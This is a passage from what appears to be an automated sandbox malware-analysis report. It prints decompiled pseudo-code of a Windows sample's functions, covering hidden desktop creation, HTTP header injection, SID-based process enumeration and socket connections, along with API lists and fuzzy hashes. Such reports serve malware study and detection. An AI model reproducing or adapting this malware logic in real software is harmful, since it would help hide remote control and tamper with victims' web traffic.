						if(_t71 == 0xffffffff) {
							_t63 = E00406C39(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E004195A4(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E004193F0( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E0041974B(E0041974B(_t63, _v1156), _v1152);
						E004163A8(_t105);
						return 0;
					} else {
						E004197A3(_t108, _t63);
						goto L4;
					}
				}
			}

0x0040d90b
0x0040d918
0x0040d91b
0x0040d91e
0x0040d91f
0x0040d923
0x0040d927
0x0040d92d
0x0040d973
0x0040d97a
0x0040d97f
0x0040d984
0x0040d989
0x0040d98d
0x0040d98f
0x00000000
0x00000000
0x0040d996
0x0040d99f
0x0040d9a7
0x0040d9a8
0x0040d9aa
0x0040d9b0
0x0040d9b8
0x00000000
0x00000000
0x0040d9be
0x0040d9c4
0x0040d9f7
0x0040da0d
0x0040da1a
0x0040da1f
0x0040da21
0x00000000
0x00000000
0x0040da30
0x0040da35
0x0040da37
0x0040db63
0x0040db6c
0x00000000
0x0040da3d
0x0040da3d
0x0040da43
0x0040da45
0x0040da4a
0x0040da4f
0x0040da5e
0x0040da63
0x0040da70
0x0040da76
0x0040da78
0x0040da85
0x0040da8a
0x0040da8c
0x0040da90
0x0040da98
0x0040daa4
0x0040dabc
0x0040dac0
0x0040dac5
0x0040dac7
0x0040dad2
0x0040dae2
0x0040dae8
0x0040daea
0x0040daea
0x0040dac7
0x0040da8c
0x0040da78
0x0040daf7
0x0040dafd
0x0040db02
0x0040db19
0x0040db26
0x0040db2e
0x0040db36
0x0040db3e
0x0040db46
0x0040db4e
0x0040db56
0x0040db5e
0x0040db5e
0x00000000
0x0040db02
0x0040d9c6
0x0040d9c9
0x0040d9e4
0x0040d9cb
0x0040d9cb
0x0040d9d3
0x0040d9d8
0x0040d9d8
0x00000000
0x0040d9c9
0x0040d934
0x0040d93a
0x0040d93b
0x0040d944
0x0040d94f
0x0040d954
0x0040d95c
0x0040d961
0x0040d967
0x0040db71
0x0040db7e
0x0040db84
0x0040db91
0x0040d96d
0x0040d96e
0x00000000
0x0040d96e
0x0040d967

APIs

Part of subcall function 004193F0: socket.WS2_32(?,00000001,00000006), ref: 004193F9
Part of subcall function 004193F0: connect.WS2_32(00000000,?,-0000001D), ref: 00419419
Part of subcall function 004193F0: closesocket.WS2_32(00000000), ref: 00419424

Part of subcall function 004197A3: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004197B9

GetCurrentThread.KERNEL32 ref: 0040D9F0
SetThreadPriority.KERNEL32(00000000), ref: 0040D9F7

Part of subcall function 00404C67: OpenWindowStationW.USER32 ref: 00404C8C
Part of subcall function 00404C67: CreateWindowStationW.USER32 ref: 00404C9F
Part of subcall function 00404C67: GetProcessWindowStation.USER32 ref: 00404CB0
Part of subcall function 00404C67: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00404CEB
Part of subcall function 00404C67: CreateDesktopW.USER32 ref: 00404CFF
Part of subcall function 00404C67: GetCurrentThreadId.KERNEL32 ref: 00404D0B
Part of subcall function 00404C67: GetThreadDesktop.USER32(00000000), ref: 00404D12
Part of subcall function 00404C67: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00404D24
Part of subcall function 00404C67: CloseDesktop.USER32(00000000,00000000,00000000), ref: 00404D36
Part of subcall function 00404C67: CloseWindowStation.USER32(?,?), ref: 00404D51

Part of subcall function 00407CD9: TlsAlloc.KERNEL32(004228E0,00000000,0000018C,00000000,00000000), ref: 00407CF2

GetShellWindow.USER32 ref: 0040DA3D
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0040DA70

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0040DAD2
CloseHandle.KERNEL32(?), ref: 0040DAE2
CloseHandle.KERNEL32(?), ref: 0040DAE8
SystemParametersInfoW.USER32 ref: 0040DAF7

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
String ID:
API String ID: 1240616959-0
Opcode ID: 02587d2689c24fb410d13aca5f39a87ed65dfdb03741e704503fb59cc83800b5
Instruction ID: 6600717c92694b0693ee519b18725b1fdcc1cbb36cd93e7df23ee735fdc730ed
Opcode Fuzzy Hash: 02587d2689c24fb410d13aca5f39a87ed65dfdb03741e704503fb59cc83800b5
Instruction Fuzzy Hash: 9E61AF705083419FD720EFA5C985E9FBBE8EF84704F00492EF594A72A1D778D849CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040771F, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040771F(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed char* _v20;
				void* _v24;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				void* _v80;
				void* _v108;
				signed int _v120;
				signed int _v124;
				char _v128;
				void* _v129;
				void* _v132;
				void* _v140;
				signed int _v176;
				void* _v177;
				intOrPtr _v180;
				void* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				intOrPtr _t89;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				intOrPtr _t131;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;
				signed int _t151;
				void* _t153;

				_t153 = (_t151 & 0xfffffff8) - 0x7c;
				_v120 = _v120 | 0xffffffff;
				_t122 =  &_v76;
				if(E00407604( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E004152C2( &_v76);
					return _v120;
				}
				_t85 = E00414994(_t122);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x4228c0;
						L18:
						__eflags =  *(_t153 + 0x18) & 0x00000004;
						if(( *(_t153 + 0x18) & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 =  *((intOrPtr*)(_t153 + 0x68));
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E00406C86(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t89 =  *0x4228d8; // 0x0
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E004163A8( *((intOrPtr*)(_t148 + _t89 + 8)));
							_t131 =  *0x4228d8; // 0x0
							 *((intOrPtr*)(_t148 + _t131 + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E00406CAC(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					 *(_t153 + 0xf) = 1;
					__eflags =  *((intOrPtr*)(_t153 + 0x7c)) - 1;
					if( *((intOrPtr*)(_t153 + 0x7c)) != 1) {
						L9:
						_t138 = _t153 + 0x28;
						_t92 = 0x21;
						E0040F9FD(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E0040F9FD(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 = _t153 + 0x28;
						_t100 = 0x23;
						E0040F9FD(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x4228c0;
						EnterCriticalSection(0x4228c0);
						__eflags =  *(_t153 + 0xf);
						if( *(_t153 + 0xf) == 0) {
							L14:
							E0041532C( *((intOrPtr*)(_t153 + 0x80)), _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E00418035( *((intOrPtr*)(_t153 + 0x10)));
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E00406C86(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t108 =  *0x4228d8; // 0x0
							_t142 = _t107 * 0x24;
							E0041532C( *((intOrPtr*)(_t108 + _t142 + 0x10)),  *((intOrPtr*)(_t108 + _t142 + 0xc)));
							_t111 =  *0x4228d8; // 0x0
							E004163A8( *((intOrPtr*)(_t142 + _t111 + 0x14)));
							_t113 =  *0x4228d8; // 0x0
							 *(_t142 + _t113 + 0x14) =  *(_t142 + _t113 + 0x14) & 0x00000000;
							_t114 =  *0x4228d8; // 0x0
							 *(_t142 + _t114 + 0x1c) =  *(_t142 + _t114 + 0x1c) & 0x00000000;
							_t115 =  *0x4228d8; // 0x0
							 *(_t142 + _t115 + 0x18) =  *(_t142 + _t115 + 0x18) | 0xffffffff;
							_t116 =  *0x4228d8; // 0x0
							 *((intOrPtr*)(_t142 + _t116 + 0xc)) = _v76;
							_t117 =  *0x4228d8; // 0x0
							 *((intOrPtr*)(_t142 + _t117 + 0x10)) = _v72;
							_t118 =  *0x4228d8; // 0x0
							 *((intOrPtr*)(_t142 + _t118 + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E00406CAC(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E00415587(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						 *(_t153 + 0xf) = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x00407725
0x0040772b
0x0040773a
0x00407748
0x00407930
0x00407934
0x00407943
0x00407943
0x00407751
0x00407759
0x0040775f
0x00407776
0x00407778
0x004078cb
0x004078d0
0x004078d0
0x004078d5
0x00000000
0x00000000
0x004078de
0x004078e8
0x004078ea
0x004078f0
0x004078f3
0x004078f8
0x004078fb
0x00407908
0x0040790a
0x0040790f
0x0040790f
0x00407916
0x0040791f
0x00407925
0x00407929
0x0040792a
0x00000000
0x0040792a
0x004078fe
0x00407903
0x00407906
0x00000000
0x00000000
0x00000000
0x00407906
0x0040777e
0x00407783
0x00407787
0x0040778b
0x004077b3
0x004077b5
0x004077b9
0x004077ba
0x004077d2
0x004077d6
0x004077da
0x004077db
0x004077ee
0x004077f2
0x004077f6
0x004077f7
0x00407805
0x00407807
0x00407807
0x0040780d
0x00407813
0x00407818
0x004078a2
0x004078ad
0x004078b2
0x004078b7
0x004078bd
0x004078bd
0x004078c2
0x004078c3
0x00000000
0x004078c3
0x0040781e
0x00407821
0x00407826
0x00407829
0x00407836
0x00407838
0x0040783d
0x00407848
0x0040784d
0x00407856
0x0040785b
0x00407860
0x00407865
0x0040786a
0x0040786f
0x00407874
0x00407879
0x00407882
0x00407886
0x0040788f
0x00407893
0x0040789c
0x00000000
0x0040789c
0x0040782c
0x00407831
0x00407834
0x00000000
0x00000000
0x00000000
0x00407834
0x0040778d
0x00407791
0x00407794
0x00000000
0x00000000
0x0040779a
0x0040779f
0x004077a3
0x004077a5
0x004077ad
0x004077a7
0x004077a7
0x004077a7
0x00000000
0x00407761
0x00407766
0x0040776c
0x00000000
0x0040776c

APIs

Part of subcall function 00414994: EnterCriticalSection.KERNEL32(00423124,?,?,?), ref: 004149AF
Part of subcall function 00414994: LeaveCriticalSection.KERNEL32(00423124,?,?,?), ref: 00414A32

SetLastError.KERNEL32(00002F78,?), ref: 00407766
EnterCriticalSection.KERNEL32(004228C0), ref: 0040780D
LeaveCriticalSection.KERNEL32(004228C0,?), ref: 004078C3
EnterCriticalSection.KERNEL32(004228C0,?), ref: 004078EA
LeaveCriticalSection.KERNEL32(004228C0,?), ref: 0040792A

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: 772eec96d0937bf82672633e68713a890c36450c698829ee003733d46d82dd04
Instruction ID: 6c4999b05ff59d76d5a631eee67b5516f628b524d45ddcada9161565492acc27
Opcode Fuzzy Hash: 772eec96d0937bf82672633e68713a890c36450c698829ee003733d46d82dd04
Instruction Fuzzy Hash: FC517271508345ABD721EF28D944A5A7BE1FF84364F50462EF864A72F1C734E885CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00415AB4, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415AB4() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v588;
				void* _v596;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t56;
				intOrPtr* _t57;
				void** _t59;
				void** _t60;
				void** _t62;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v596;
						_v596 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v588;
						__eflags = _t65 - _t71;
						if(_t65 <= _t71) {
							L20:
							_t45 = Process32NextW(_v20,  &_v596);
							continue;
						}
						__eflags = _t65 -  *0x422e08; // 0x0
						if(__eflags == 0) {
							goto L20;
						}
						_t47 = 0;
						__eflags = _v12 - _t71;
						if(_v12 <= _t71) {
							L8:
							_t48 = E0040ED0F(_t65, _t70, _t65);
							_v28 = _t48;
							__eflags = _t48 - _t71;
							if(_t48 == _t71) {
								goto L20;
							}
							_t73 = OpenProcess(0x400, _t71, _v588);
							__eflags = _t73 - _t71;
							if(_t73 == _t71) {
								L19:
								CloseHandle(_v28);
								goto L20;
							}
							_t72 = E004179BF(_t65, _t73,  &_v32);
							CloseHandle(_t73);
							__eflags = _t72;
							if(_t72 == 0) {
								L18:
								_t71 = 0;
								__eflags = 0;
								goto L19;
							} else {
								__eflags = _v32 -  *0x422ba8; // 0x0
								if(__eflags == 0) {
									_t56 = GetLengthSid( *_t72);
									__eflags = _t56 -  *0x422ba0;
									if(_t56 ==  *0x422ba0) {
										_t57 =  *0x422b9c; // 0x0
										_t59 = E00416419( *_t57,  *_t72, _t56);
										__eflags = _t59;
										if(_t59 == 0) {
											_t60 = E00416333(4 + _v12 * 4,  &_v16);
											__eflags = _t60;
											if(_t60 != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
												_t62 = E00415A2B(_v16, _v588, _v28);
												__eflags = _t62;
												if(_t62 != 0) {
													_v5 = 1;
												}
											}
										}
									}
								}
								E004163A8(_t72);
								goto L18;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t70 = _v16;
							__eflags =  *((intOrPtr*)(_t70 + _t47 * 4)) - _t65;
							if( *((intOrPtr*)(_t70 + _t47 * 4)) == _t65) {
								goto L20;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - _v12;
							if(_t47 < _v12) {
								continue;
							}
							goto L8;
						}
						goto L20;
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E004163A8(_v16);
				return _v5;
			}

0x00415ac6
0x00415ac8
0x00415acc
0x00415acf
0x00415ad2
0x00415ad5
0x00415adb
0x00415ade
0x00415ae4
0x00000000
0x00415aea
0x00415aea
0x00415af4
0x00415afe
0x00415afe
0x00415c08
0x00415b09
0x00415b0f
0x00415b11
0x00415bf8
0x00415c02
0x00000000
0x00415c02
0x00415b17
0x00415b1d
0x00000000
0x00000000
0x00415b23
0x00415b25
0x00415b28
0x00415b3c
0x00415b3d
0x00415b42
0x00415b45
0x00415b47
0x00000000
0x00000000
0x00415b5f
0x00415b61
0x00415b63
0x00415bf3
0x00415bf6
0x00000000
0x00415bf6
0x00415b74
0x00415b76
0x00415b78
0x00415b7a
0x00415bf1
0x00415bf1
0x00415bf1
0x00000000
0x00415b7c
0x00415b7f
0x00415b85
0x00415b89
0x00415b8f
0x00415b95
0x00415b9a
0x00415ba1
0x00415ba6
0x00415ba8
0x00415bb7
0x00415bbc
0x00415bbe
0x00415bc0
0x00415bcf
0x00415bd2
0x00415bd5
0x00415bde
0x00415be3
0x00415be5
0x00415be7
0x00415be7
0x00415be5
0x00415bbe
0x00415ba8
0x00415b95
0x00415bec
0x00000000
0x00415bec
0x00000000
0x00000000
0x00000000
0x00415b2a
0x00415b2a
0x00415b2a
0x00415b2d
0x00415b30
0x00000000
0x00000000
0x00415b36
0x00415b37
0x00415b3a
0x00000000
0x00000000
0x00000000
0x00415b3a
0x00000000
0x00415b2a
0x00415c13
0x00415c18
0x00000000
0x00000000
0x00000000
0x00415c18
0x00415c21
0x00415c2d

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415AD5
Process32FirstW.KERNEL32(000001E6,?), ref: 00415AFE
OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 00415B59
CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 00415B76
GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 00415B89
CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 00415BF6
Process32NextW.KERNEL32(000001E6,0000022C), ref: 00415C02
CloseHandle.KERNEL32(000001E6,?,74B5F560,00000000), ref: 00415C13

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: a8ae7269d01f89b9def8b6b83cfa10f47e06fdd957c47c0d0eb1a149c41586a0
Instruction ID: 35428b9b7fbbddad797699f5338242450ba2a5e6068569fffc04e0406f00be5b
Opcode Fuzzy Hash: a8ae7269d01f89b9def8b6b83cfa10f47e06fdd957c47c0d0eb1a149c41586a0
Instruction Fuzzy Hash: 0A417C30904519EFCB21EFA5DC849EEBBB5FF85304F1441AAE415A3260D735AAC2CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE91, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CE91(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x0040ce9a
0x0040cea1
0x0040cea3
0x0040cea5
0x0040ceab
0x0040cebe
0x0040cec1
0x0040cec4
0x0040ced1
0x0040ced9
0x0040cee4
0x0040cf03
0x0040cf07
0x0040cf0a
0x0040cf28
0x0040cf28
0x0040cf2b
0x0040cf4b
0x00000000
0x0040cf2d
0x0040cf2d
0x0040cf2d
0x0040cf2e
0x0040cf46
0x0040cf30
0x0040cf30
0x0040cf30
0x0040cf31
0x0040cf3e
0x00000000
0x0040cf33
0x0040cf33
0x0040cf34
0x00000000
0x00000000
0x0040cf34
0x0040cf31
0x0040cf2e
0x0040cf0c
0x0040cf0c
0x0040cf23
0x0040cf23
0x00000000
0x0040cf0e
0x0040cf0f
0x0040cf0f
0x0040cf10
0x00000000
0x0040cf12
0x0040cf13
0x0040cf13
0x0040cf14
0x0040cf36
0x0040cf36
0x00000000
0x0040cf16
0x0040cf16
0x0040cf16
0x0040cf19
0x0040cf41
0x0040cf41
0x0040cf1b
0x0040cf1b
0x0040cf1b
0x0040cf1c
0x0040cf39
0x0040cf39
0x0040cf1e
0x0040cf1e
0x0040cf1f
0x0040cf4e
0x0040cf4e
0x0040cf4e
0x0040cf1f
0x0040cf1c
0x0040cf19
0x0040cf14
0x0040cf10
0x0040cf0c
0x0040cee6
0x0040cee6
0x0040cee9
0x0040ceef
0x0040cef5
0x0040cef8
0x0040cefb
0x0040cefe
0x0040cefe
0x0040cf55
0x0040cf5d
0x0040cf6f
0x0040cf83
0x0040cf83
0x00000000
0x0040cfa7
0x0040cf5d
0x0040cfb1

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040CEA5
ReleaseMutex.KERNEL32(?), ref: 0040CEC4
GetWindowRect.USER32 ref: 0040CED1
IsRectEmpty.USER32(?), ref: 0040CF55
GetWindowLongW.USER32(?,000000F0), ref: 0040CF64
GetParent.USER32(?), ref: 0040CF7A
MapWindowPoints.USER32 ref: 0040CF83
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040CFA7

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: c41954ec6d3e168b39ccf0af096429a80b4581b8a0f3b33277427a0f8b808706
Instruction ID: cbc74b3b929829f3c444a761e227ba3d0cca7254c115a46270ba0b8a2fa6f5e0
Opcode Fuzzy Hash: c41954ec6d3e168b39ccf0af096429a80b4581b8a0f3b33277427a0f8b808706
Instruction Fuzzy Hash: D641127190020BEFDB109F98C9896FEBBB5FB04350F10467AE615F22E0D7789940DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00414994, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00414994(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x423124);
				_t225 =  *0x423140;
				if( *0x423140 == 0 ||  *0x42313c == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E004140C9(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E00405AEB();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E00414183(0, 4,  &_v20,  *0x42313c);
							_push(_v20);
							if(_t214 == 0) {
								E004163A8();
							}
							E00405B56(_t225);
						}
						E004163A8( *0x42313c);
						E004163A8( *0x423140);
						 *0x42313c = _t217;
						 *0x423140 = _t217;
					}
				}
				LeaveCriticalSection(0x423124);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E00414384(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E0040F9FD(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00416419( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E0040FA33(_t167,  &_v168);
						_t172 = E00417116( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E0040FA33(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
